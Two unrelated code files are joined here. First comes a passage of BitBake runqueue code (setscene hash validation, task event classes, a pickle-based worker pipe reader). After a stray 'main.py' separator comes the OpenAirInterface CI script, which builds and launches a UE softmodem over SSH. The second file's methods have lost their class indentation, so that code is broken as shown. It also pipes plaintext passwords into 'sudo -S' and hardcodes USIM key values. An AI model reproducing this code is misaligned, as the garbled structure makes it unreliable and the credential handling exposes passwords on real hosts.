        if rq.check_stamp_task(tid, taskname, recurse = True, cache=stampcache):
            logger.debug(2, 'Normal stamp current for task %s', tid)
            sqdata.stamppresent.add(tid)
            sqrq.sq_task_skip(tid)
            continue

        # Neither stamped nor noexec: needs a hash validity check below.
        tocheck.add(tid)

    # One batched call to the hash validation backend for everything left.
    sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary)

    sqdata.hashes = {}
    for mc in sorted(sqdata.multiconfigs):
        for tid in sorted(sqdata.sq_revdeps):
            if mc_from_tid(tid) != mc:
                continue
            if tid in sqdata.stamppresent:
                continue
            if tid in sqdata.valid:
                continue
            if tid in sqdata.noexec:
                continue
            if tid in sqrq.scenequeue_notcovered:
                continue
            # Not skipped, not valid, not otherwise accounted for: the
            # setscene variant will fail outright unless deferred.
            sqdata.outrightfail.add(tid)

            h = pending_hash_index(tid, rqdata)
            if h not in sqdata.hashes:
                # First task seen with this pending hash wins.
                sqdata.hashes[h] = tid
            else:
                # Same pending hash as an earlier task: run after it instead.
                sqrq.sq_deferred[tid] = sqdata.hashes[h]
                bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
class TaskFailure(Exception):
    """
    Exception raised when a task in a runqueue fails
    """
    def __init__(self, x):
        # NOTE(review): assigns x straight to self.args, which the Exception
        # machinery treats as the argument tuple — callers are presumably
        # passing a tuple here; confirm before changing.
        self.args = x
class runQueueExitWait(bb.event.Event):
    """
    Fired while the runqueue is draining: reports how many active task
    processes are still being waited on before shutdown completes.
    """
    def __init__(self, remain):
        self.remain = remain
        self.message = "Waiting for %s active tasks to finish" % remain
        super().__init__()
class runQueueEvent(bb.event.Event):
    """
    Common base class for runqueue task events.  Captures the identity of
    the task concerned (id, name, file, hash) plus a snapshot of the
    queue statistics at the moment the event fired.
    """
    def __init__(self, task, stats, rq):
        # The display string starts out equal to the id; setscene
        # subclasses append a suffix to it.
        self.taskid = self.taskstring = task
        self.taskname = taskname_from_tid(task)
        self.taskfile = fn_from_tid(task)
        self.taskhash = rq.rqdata.get_task_hash(task)
        # Copy so later queue progress cannot mutate the event payload.
        self.stats = stats.copy()
        bb.event.Event.__init__(self)
class sceneQueueEvent(runQueueEvent):
    """
    Base sceneQueue event class.

    Extends runQueueEvent by tagging the task string and task name with
    the "_setscene" suffix used for setscene task variants.
    """
    def __init__(self, task, stats, rq, noexec=False):
        runQueueEvent.__init__(self, task, stats, rq)
        # Only the display string and name need the suffix.  The previous
        # code also re-assigned self.taskfile and self.taskhash here, but
        # runQueueEvent.__init__ already set them to identical values
        # (fn_from_tid(task) / rq.rqdata.get_task_hash(task)), so those
        # redundant assignments have been dropped.
        self.taskstring = task + "_setscene"
        self.taskname = taskname_from_tid(task) + "_setscene"
class runQueueTaskStarted(runQueueEvent):
    """
    Event notifying that a runqueue task has been launched.  `noexec`
    flags tasks that are stamped without actually being executed.
    """
    def __init__(self, task, stats, rq, noexec=False):
        self.noexec = noexec
        super().__init__(task, stats, rq)
class sceneQueueTaskStarted(sceneQueueEvent):
    """
    Event notifying that a setscene task has been launched.  `noexec`
    flags tasks that are stamped without actually being executed.
    """
    def __init__(self, task, stats, rq, noexec=False):
        self.noexec = noexec
        super().__init__(task, stats, rq)
class runQueueTaskFailed(runQueueEvent):
    """
    Event notifying that a runqueue task exited unsuccessfully; carries
    the process exit code.
    """
    def __init__(self, task, stats, exitcode, rq):
        self.exitcode = exitcode
        super().__init__(task, stats, rq)

    def __str__(self):
        # Message shown by UIs in the failure summary.
        return "Task (%s) failed with exit code '%s'" % (self.taskstring, self.exitcode)
class sceneQueueTaskFailed(sceneQueueEvent):
    """
    Event notifying that a setscene task exited unsuccessfully; the
    corresponding real task will be executed instead.
    """
    def __init__(self, task, stats, exitcode, rq):
        self.exitcode = exitcode
        super().__init__(task, stats, rq)

    def __str__(self):
        # Message shown by UIs in the failure summary.
        return "Setscene task (%s) failed with exit code '%s' - real task will be run instead" % (self.taskstring, self.exitcode)
class sceneQueueComplete(sceneQueueEvent):
    """
    Event when all the sceneQueue tasks are complete
    """
    def __init__(self, stats, rq):
        # Deliberately bypasses sceneQueueEvent/runQueueEvent.__init__:
        # there is no single task to describe, only a final stats snapshot.
        self.stats = stats.copy()
        bb.event.Event.__init__(self)
class runQueueTaskCompleted(runQueueEvent):
    """
    Event notifying a task completed successfully.

    No extra payload: the task identity and stats snapshot are filled in
    by runQueueEvent.__init__.
    """
class sceneQueueTaskCompleted(sceneQueueEvent):
    """
    Event notifying a setscene task completed successfully.

    No extra payload: the "_setscene"-tagged task identity is filled in
    by sceneQueueEvent.__init__.
    """
class runQueueTaskSkipped(runQueueEvent):
    """
    Event notifying that a runqueue task was skipped; `reason` records
    why it did not need to run.
    """
    def __init__(self, task, stats, rq, reason):
        self.reason = reason
        super().__init__(task, stats, rq)
class taskUniHashUpdate(bb.event.Event):
    """
    Event notifying that a task's unihash has been updated.

    (The previous docstring, "Base runQueue event class", was a
    copy-paste error — this event carries a tid/unihash pair and is
    consumed by runQueuePipe.read to feed updated_taskhash_queue.)
    """
    def __init__(self, task, unihash):
        self.taskid = task
        self.unihash = unihash
        bb.event.Event.__init__(self)
class runQueuePipe():
    """
    Abstraction for a pipe between a worker thread and the server.

    Incrementally reads the worker's byte stream and parses two framed,
    pickled message types: <event>...</event> payloads, which are re-fired
    as bitbake events, and <exitcode>...</exitcode> payloads, which report
    (task, status) process completions.
    """
    def __init__(self, pipein, pipeout, d, rq, rqexec):
        self.input = pipein
        if pipeout:
            # Write end belongs to the worker; close our copy.
            pipeout.close()
        bb.utils.nonblockingfd(self.input)
        self.queue = b""   # unparsed bytes carried over between read() calls
        self.d = d
        self.rq = rq
        self.rqexec = rqexec

    def setrunqueueexec(self, rqexec):
        self.rqexec = rqexec

    def read(self):
        """Drain available pipe data, dispatch complete messages.

        Returns True if any new bytes arrived (callers loop on this)."""
        # First, notice any worker process that died unexpectedly.
        for workers, name in [(self.rq.worker, "Worker"), (self.rq.fakeworker, "Fakeroot")]:
            for worker in workers.values():
                worker.process.poll()
                if worker.process.returncode is not None and not self.rq.teardown:
                    bb.error("%s process (%s) exited unexpectedly (%s), shutting down..." % (name, worker.process.pid, str(worker.process.returncode)))
                    self.rq.finish_runqueue(True)

        start = len(self.queue)
        try:
            # Non-blocking fd: EAGAIN simply means nothing to read yet.
            self.queue = self.queue + (self.input.read(102400) or b"")
        except (OSError, IOError) as e:
            if e.errno != errno.EAGAIN:
                raise
        end = len(self.queue)

        found = True
        while found and len(self.queue):
            found = False
            index = self.queue.find(b"</event>")
            while index != -1 and self.queue.startswith(b"<event>"):
                try:
                    # 7 == len(b"<event>"); slice out the pickled payload.
                    event = pickle.loads(self.queue[7:index])
                except (ValueError, pickle.UnpicklingError, AttributeError, IndexError) as e:
                    if isinstance(e, pickle.UnpicklingError) and "truncated" in str(e):
                        # The pickled data could contain "</event>" so search for the next occurrence
                        # unpickling again, this should be the only way an unpickle error could occur
                        index = self.queue.find(b"</event>", index + 1)
                        continue
                    bb.msg.fatal("RunQueue", "failed load pickle '%s': '%s'" % (e, self.queue[7:index]))
                bb.event.fire_from_worker(event, self.d)
                if isinstance(event, taskUniHashUpdate):
                    self.rqexec.updated_taskhash_queue.append((event.taskid, event.unihash))
                found = True
                # 8 == len(b"</event>"): drop the consumed frame.
                self.queue = self.queue[index+8:]
                index = self.queue.find(b"</event>")
            index = self.queue.find(b"</exitcode>")
            while index != -1 and self.queue.startswith(b"<exitcode>"):
                try:
                    # 10 == len(b"<exitcode>").
                    task, status = pickle.loads(self.queue[10:index])
                except (ValueError, pickle.UnpicklingError, AttributeError, IndexError) as e:
                    bb.msg.fatal("RunQueue", "failed load pickle '%s': '%s'" % (e, self.queue[10:index]))
                self.rqexec.runqueue_process_waitpid(task, status)
                found = True
                # 11 == len(b"</exitcode>").
                self.queue = self.queue[index+11:]
                index = self.queue.find(b"</exitcode>")
        return (end > start)

    def close(self):
        """Flush remaining messages, warn on trailing partial data, close fd."""
        while self.read():
            continue
        if len(self.queue) > 0:
            print("Warning, worker left partial message: %s" % self.queue)
        self.input.close()
def get_setscene_enforce_whitelist(d):
    """
    Return the expanded BB_SETSCENE_ENFORCE_WHITELIST as a list, or None
    when setscene enforcement (BB_SETSCENE_ENFORCE != '1') is disabled.

    Entries of the form "%:<task>" are expanded once per non-option
    command-line argument, using that argument's base name (text before
    any ':'); all other entries are passed through unchanged.
    """
    if d.getVar('BB_SETSCENE_ENFORCE') != '1':
        return None
    whitelist = (d.getVar("BB_SETSCENE_ENFORCE_WHITELIST") or "").split()
    outlist = []
    # The previous code iterated over a defensive copy (whitelist[:]),
    # but the list is never mutated inside the loop, so iterate directly.
    for item in whitelist:
        if item.startswith('%:'):
            for target in sys.argv[1:]:
                if not target.startswith('-'):
                    outlist.append(target.split(':')[0] + ':' + item.split(':')[1])
        else:
            outlist.append(item)
    return outlist
def check_setscene_enforce_whitelist(pn, taskname, whitelist):
    """
    Return True when "<pn>:<taskname>" matches any fnmatch pattern in
    whitelist.  A whitelist of None means enforcement is disabled, so
    everything is allowed.
    """
    import fnmatch
    if whitelist is None:
        return True
    item = '%s:%s' % (pn, taskname)
    return any(fnmatch.fnmatch(item, pattern) for pattern in whitelist)
|
main.py | #/*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Import Components
#-----------------------------------------------------------
import helpreadme as HELP
import constants as CONST
import cls_physim #class PhySim for physical simulators build and test
import cls_cots_ue #class CotsUe for Airplane mode control
import sshconnection
import epc
import ran
import html
#-----------------------------------------------------------
# Import Libs
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
# Global logging setup for the CI driver: everything from DEBUG up,
# tagged with timestamp, logger name and severity.
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# OaiCiTest Class Definition
#-----------------------------------------------------------
class OaiCiTest():
def __init__(self):
    """Initialize all test-bench configuration to empty defaults;
    values are filled in later from the command line / XML test files."""
    # --- RAN repository under test ---
    self.ranRepository = ''
    self.ranBranch = ''
    self.ranCommitID = ''
    self.ranAllowMerge = False
    self.ranTargetBranch = ''
    self.FailReportCnt = 0
    # --- ADB bench host controlling the COTS UEs ---
    self.ADBIPAddress = ''
    self.ADBUserName = ''
    self.ADBPassword = ''
    self.ADBCentralized = True
    # --- Current test case identity ---
    self.testCase_id = ''
    self.testXMLfiles = []
    self.desc = ''
    # --- Traffic test (ping / iperf) parameters ---
    self.ping_args = ''
    self.ping_packetloss_threshold = ''
    self.iperf_args = ''
    self.iperf_packetloss_threshold = ''
    self.iperf_profile = ''
    self.iperf_options = ''
    self.nbMaxUEtoAttach = -1
    # --- Attached UE devices bookkeeping (parallel lists indexed per UE) ---
    self.UEDevices = []
    self.UEDevicesStatus = []
    self.UEDevicesRemoteServer = []
    self.UEDevicesRemoteUser = []
    self.UEDevicesOffCmd = []
    self.UEDevicesOnCmd = []
    self.UEDevicesRebootCmd = []
    self.CatMDevices = []
    self.UEIPAddresses = []
    self.idle_sleep_time = 0
    # --- X2 handover scenario state ---
    self.x2_ho_options = 'network'
    self.x2NbENBs = 0
    self.x2ENBBsIds = []
    self.x2ENBConnectedUEs = []
    self.repeatCounts = []
    self.finalStatus = False
    # --- OAI UE (softmodem) bench ---
    self.UEIPAddress = ''
    self.UEUserName = ''
    self.UEPassword = ''
    self.UE_instance = 0
    self.UESourceCodePath = ''
    self.UELogFile = ''
    self.Build_OAI_UE_args = ''
    self.Initialize_OAI_UE_args = ''
    self.clean_repository = True
    self.air_interface=''
    self.expectedNbOfConnectedUEs = 0
def BuildOAIUE(self):
    """
    Clone/update the RAN repository on the UE host over SSH and build the
    UE softmodem (nr-uesoftmodem or lte-uesoftmodem depending on
    Build_OAI_UE_args).  Skips the build when LAST_BUILD_INFO.txt shows
    the same commit/merge state.  Records the result in the HTML report;
    exits the script on build failure.
    """
    if self.UEIPAddress == '' or self.ranRepository == '' or self.ranBranch == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
        HELP.GenericHelp(CONST.Version)
        sys.exit('Insufficient Parameter')
    SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
    # Select the 5G or 4G UE binary from the build arguments.
    result = re.search('--nrUE', self.Build_OAI_UE_args)
    if result is not None:
        self.air_interface='nr-uesoftmodem'
        ue_prefix = 'NR '   # NOTE(review): ue_prefix is unused below — confirm intent
    else:
        self.air_interface='lte-uesoftmodem'
        ue_prefix = ''
    # Normalize the repository URL to end in ".git".
    result = re.search('([a-zA-Z0-9\:\-\.\/])+\.git', self.ranRepository)
    if result is not None:
        full_ran_repo_name = self.ranRepository
    else:
        full_ran_repo_name = self.ranRepository + '.git'
    SSH.command('mkdir -p ' + self.UESourceCodePath, '\$', 5)
    SSH.command('cd ' + self.UESourceCodePath, '\$', 5)
    SSH.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + full_ran_repo_name + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
    # here add a check if git clone or git fetch went smoothly
    SSH.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
    SSH.command('git config user.name "OAI Jenkins"', '\$', 5)
    if self.clean_repository:
        # Compare LAST_BUILD_INFO.txt with the requested commit/merge
        # state; if nothing changed, the previous build is reused.
        SSH.command('ls *.txt', '\$', 5)
        result = re.search('LAST_BUILD_INFO', SSH.getBefore())
        if result is not None:
            mismatch = False
            SSH.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
            result = re.search(self.ranCommitID, SSH.getBefore())
            if result is None:
                mismatch = True
            SSH.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
            if self.ranAllowMerge:
                result = re.search('YES', SSH.getBefore())
                if result is None:
                    mismatch = True
                SSH.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
                if self.ranTargetBranch == '':
                    result = re.search('develop', SSH.getBefore())
                else:
                    result = re.search(self.ranTargetBranch, SSH.getBefore())
                if result is None:
                    mismatch = True
            else:
                result = re.search('NO', SSH.getBefore())
                if result is None:
                    mismatch = True
            if not mismatch:
                SSH.close()
                HTML.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', CONST.ALL_PROCESSES_OK)
                return
        SSH.command('echo ' + self.UEPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
    # if the commit ID is provided use it to point to it
    if self.ranCommitID != '':
        SSH.command('git checkout -f ' + self.ranCommitID, '\$', 5)
    # if the branch is not develop, then it is a merge request and we need to do
    # the potential merge. Note that merge conflicts should already been checked earlier
    if self.ranAllowMerge:
        if self.ranTargetBranch == '':
            if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
                SSH.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
        else:
            logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
            SSH.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
    SSH.command('source oaienv', '\$', 5)
    SSH.command('cd cmake_targets', '\$', 5)
    SSH.command('mkdir -p log', '\$', 5)
    SSH.command('chmod 777 log', '\$', 5)
    # no need to remove in log (git clean did the trick)
    SSH.command('stdbuf -o0 ./build_oai ' + self.Build_OAI_UE_args + ' 2>&1 | stdbuf -o0 tee compile_oai_ue.log', 'Bypassing the Tests|build have failed', 900)
    # Run twice — presumably to flush/refresh the pexpect buffer before
    # matching on the directory listing; confirm before simplifying.
    SSH.command('ls ran_build/build', '\$', 3)
    SSH.command('ls ran_build/build', '\$', 3)
    # The build succeeded iff the expected binary shows up in the listing.
    buildStatus = True
    result = re.search(self.air_interface, SSH.getBefore())
    if result is None:
        buildStatus = False
    SSH.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
    SSH.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
    SSH.command('mv compile_oai_ue.log ' + 'build_log_' + self.testCase_id, '\$', 5)
    if buildStatus:
        # Generating a BUILD INFO file
        SSH.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
        SSH.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
        if self.ranAllowMerge:
            SSH.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
            if self.ranTargetBranch == '':
                SSH.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
            else:
                SSH.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
        else:
            SSH.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
        SSH.close()
        HTML.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', CONST.ALL_PROCESSES_OK, 'OAI UE')
    else:
        SSH.close()
        logging.error('\u001B[1m Building OAI UE Failed\u001B[0m')
        HTML.CreateHtmlTestRow(self.Build_OAI_UE_args, 'KO', CONST.ALL_PROCESSES_OK, 'OAI UE')
        HTML.CreateHtmlTabFooter(False)
        sys.exit(1)
def CheckFlexranCtrlInstallation(self):
    """Probe the EPC host for a FlexRAN RT controller binary and record
    the result in RAN.flexranCtrlInstalled.  No-op when the EPC
    connection parameters are not configured."""
    if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '':
        return
    SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
    SSH.command('ls -ls /opt/flexran_rtc/*/rt_controller', '\$', 5)
    if re.search('/opt/flexran_rtc/build/rt_controller', SSH.getBefore()) is not None:
        RAN.flexranCtrlInstalled=True
        logging.debug('Flexran Controller is installed')
    SSH.close()
def InitializeFlexranCtrl(self):
    """
    Launch the FlexRAN real-time controller on the EPC host as a daemon
    and record success in RAN.flexranCtrlStarted / the HTML report.
    No-op unless CheckFlexranCtrlInstallation found an installation.
    """
    if RAN.flexranCtrlInstalled == False:
        return
    if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '':
        HELP.GenericHelp(CONST.Version)
        sys.exit('Insufficient Parameter')
    SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
    SSH.command('cd /opt/flexran_rtc', '\$', 5)
    SSH.command('echo ' + EPC.Password + ' | sudo -S rm -f log/*.log', '\$', 5)
    # Wrap the controller invocation in a helper script so `daemon` can run it.
    SSH.command('echo ' + EPC.Password + ' | sudo -S echo "build/rt_controller -c log_config/basic_log" > ./my-flexran-ctl.sh', '\$', 5)
    SSH.command('echo ' + EPC.Password + ' | sudo -S chmod 755 ./my-flexran-ctl.sh', '\$', 5)
    SSH.command('echo ' + EPC.Password + ' | sudo -S daemon --unsafe --name=flexran_rtc_daemon --chdir=/opt/flexran_rtc -o /opt/flexran_rtc/log/flexranctl_' + self.testCase_id + '.log ././my-flexran-ctl.sh', '\$', 5)
    # Confirm the controller process is actually up.
    SSH.command('ps -aux | grep --color=never rt_controller', '\$', 5)
    result = re.search('rt_controller -c ', SSH.getBefore())
    if result is not None:
        logging.debug('\u001B[1m Initialize FlexRan Controller Completed\u001B[0m')
        RAN.flexranCtrlStarted=True
    SSH.close()
    HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def InitializeUE_common(self, device_id, idx):
    """
    Put one COTS UE (adb device id `device_id`, bench index `idx`) into a
    known "data enabled / radio off (airplane mode on)" state.

    Runs inside a child Process (see InitializeUE): on any failure it
    signals the parent with SIGUSR1 rather than raising.
    """
    try:
        SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
        if not self.ADBCentralized:
            # Decentralized bench: drive the phone through its own remote
            # server over ssh instead of the central ADB host.
            # Reboot UE
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesRebootCmd[idx], '\$', 60)
            # Wait
            #time.sleep(60)
            # Put in LTE-Mode only
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode 11"\'', '\$', 60)
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode1 11"\'', '\$', 60)
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode2 11"\'', '\$', 60)
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode3 11"\'', '\$', 60)
            # enable data service
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
            # we need to do radio on/off cycle to make sure of above changes
            # airplane mode off // radio on
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
            #time.sleep(10)
            # airplane mode on // radio off
            #SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
            # normal procedure without reboot
            # enable data service
            SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
            # airplane mode on // radio off
            SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
            SSH.close()
            return
        #RH quick add-on to integrate cots control defined by yaml
        #if device_id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
        #otherwise we use the legacy procedure
        if COTS_UE.Check_Exists(device_id):
            #switch device to Airplane mode ON (ie Radio OFF)
            COTS_UE.Set_Airplane(device_id, 'ON')
        else:
            # enable data service
            SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
            # The following commands are deprecated since we no longer work on Android 7+
            # SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
            # SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
            # a dedicated script has to be installed inside the UE
            # airplane mode on means call /data/local/tmp/off
            # This particular handset needs the script run as root.
            if device_id == '84B7N16418004022':
                SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
            else:
                SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
        #airplane mode off means call /data/local/tmp/on
        logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
        SSH.close()
    except:
        # NOTE(review): bare except — also swallows SystemExit/KeyboardInterrupt.
        # Appears intentional here (any child failure must wake the parent),
        # but consider `except Exception:` if that breadth is not required.
        os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
    """Initialize every attached COTS UE in parallel: one daemon child
    Process per device running InitializeUE_common, then wait for all of
    them and record an OK row in the HTML report."""
    if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
        HELP.GenericHelp(CONST.Version)
        sys.exit('Insufficient Parameter')
    workers = []
    for idx, device_id in enumerate(self.UEDevices):
        proc = Process(target = self.InitializeUE_common, args = (device_id, idx,))
        proc.daemon = True
        proc.start()
        workers.append(proc)
    for proc in workers:
        proc.join()
    HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def InitializeOAIUE(self):
    """
    Start the OAI UE softmodem on the UE host and wait for it to
    synchronize with the eNB/gNB.

    Flow: optional eNB-process sanity check (LTE only), USRP reset,
    configuration-file regeneration (LTE) or RAW file staging (NR), then
    up to 5 start attempts; each attempt waits first for thread sync
    ("got sync" / "Starting sync detection") and then for cell sync
    (positive "Measured Carrier Frequency" for NR, absence of "No cell
    synchronization found" for LTE).  On success, optionally checks the
    oaitun tunnel interfaces.  Outcome is written to the HTML report; a
    failure triggers AutoTerminateUEandeNB().
    """
    if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
        HELP.GenericHelp(CONST.Version)
        sys.exit('Insufficient Parameter')
    if self.air_interface == 'lte-uesoftmodem':
        result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
        if result is None:
            # L2 connection expected: the eNB process must already be up.
            check_eNB = True
            check_OAI_UE = False
            pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
            if (pStatus < 0):
                HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'KO', pStatus)
                HTML.CreateHtmlTabFooter(False)
                sys.exit(1)
        UE_prefix = ''
    else:
        UE_prefix = 'NR '
    SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
    # b2xx_fx3_utils reset procedure
    SSH.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 60)
    result = re.search('type: b200', SSH.getBefore())
    if result is not None:
        logging.debug('Found a B2xx device --> resetting it')
        SSH.command('echo ' + self.UEPassword + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
        # Reloading FGPA bin firmware
        SSH.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 60)
    result = re.search('type: n3xx', str(SSH.getBefore()))
    if result is not None:
        logging.debug('Found a N3xx device --> resetting it')
    SSH.command('cd ' + self.UESourceCodePath, '\$', 5)
    # Initialize_OAI_UE_args usually start with -C and followed by the location in repository
    SSH.command('source oaienv', '\$', 5)
    SSH.command('cd cmake_targets/ran_build/build', '\$', 5)
    if self.air_interface == 'lte-uesoftmodem':
        result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
        # We may have to regenerate the .u* files
        if result is None:
            SSH.command('ls /tmp/*.sed', '\$', 5)
            result = re.search('adapt_usim_parameters', SSH.getBefore())
            if result is not None:
                SSH.command('sed -f /tmp/adapt_usim_parameters.sed ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
            else:
                SSH.command('sed -e "s#93#92#" -e "s#8baf473f2f8fd09487cccbd7097c6862#fec86ba6eb707ed08905757b1bb44b8f#" -e "s#e734f8734007d6c5ce7a0508809e7e9c#C42449363BBAD02B66D16BC975D77CC1#" ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
            SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf .u*', '\$', 5)
            SSH.command('echo ' + self.UEPassword + ' | sudo -S ../../../targets/bin/conf2uedata -c ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf -o .', '\$', 5)
    else:
        SSH.command('if [ -e rbconfig.raw ]; then echo ' + self.UEPassword + ' | sudo -S rm rbconfig.raw; fi', '\$', 5)
        SSH.command('if [ -e reconfig.raw ]; then echo ' + self.UEPassword + ' | sudo -S rm reconfig.raw; fi', '\$', 5)
        # Copy the RAW files from gNB running directory (maybe on another machine)
        copyin_res = SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/rbconfig.raw', '.')
        if (copyin_res == 0):
            SSH.copyout(self.UEIPAddress, self.UEUserName, self.UEPassword, './rbconfig.raw', self.UESourceCodePath + '/cmake_targets/ran_build/build')
        copyin_res = SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/reconfig.raw', '.')
        if (copyin_res == 0):
            SSH.copyout(self.UEIPAddress, self.UEUserName, self.UEPassword, './reconfig.raw', self.UESourceCodePath + '/cmake_targets/ran_build/build')
    # Wrap the softmodem launch in a small run script, then clear any old log.
    SSH.command('echo "ulimit -c unlimited && ./'+ self.air_interface +' ' + self.Initialize_OAI_UE_args + '" > ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
    SSH.command('chmod 775 ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
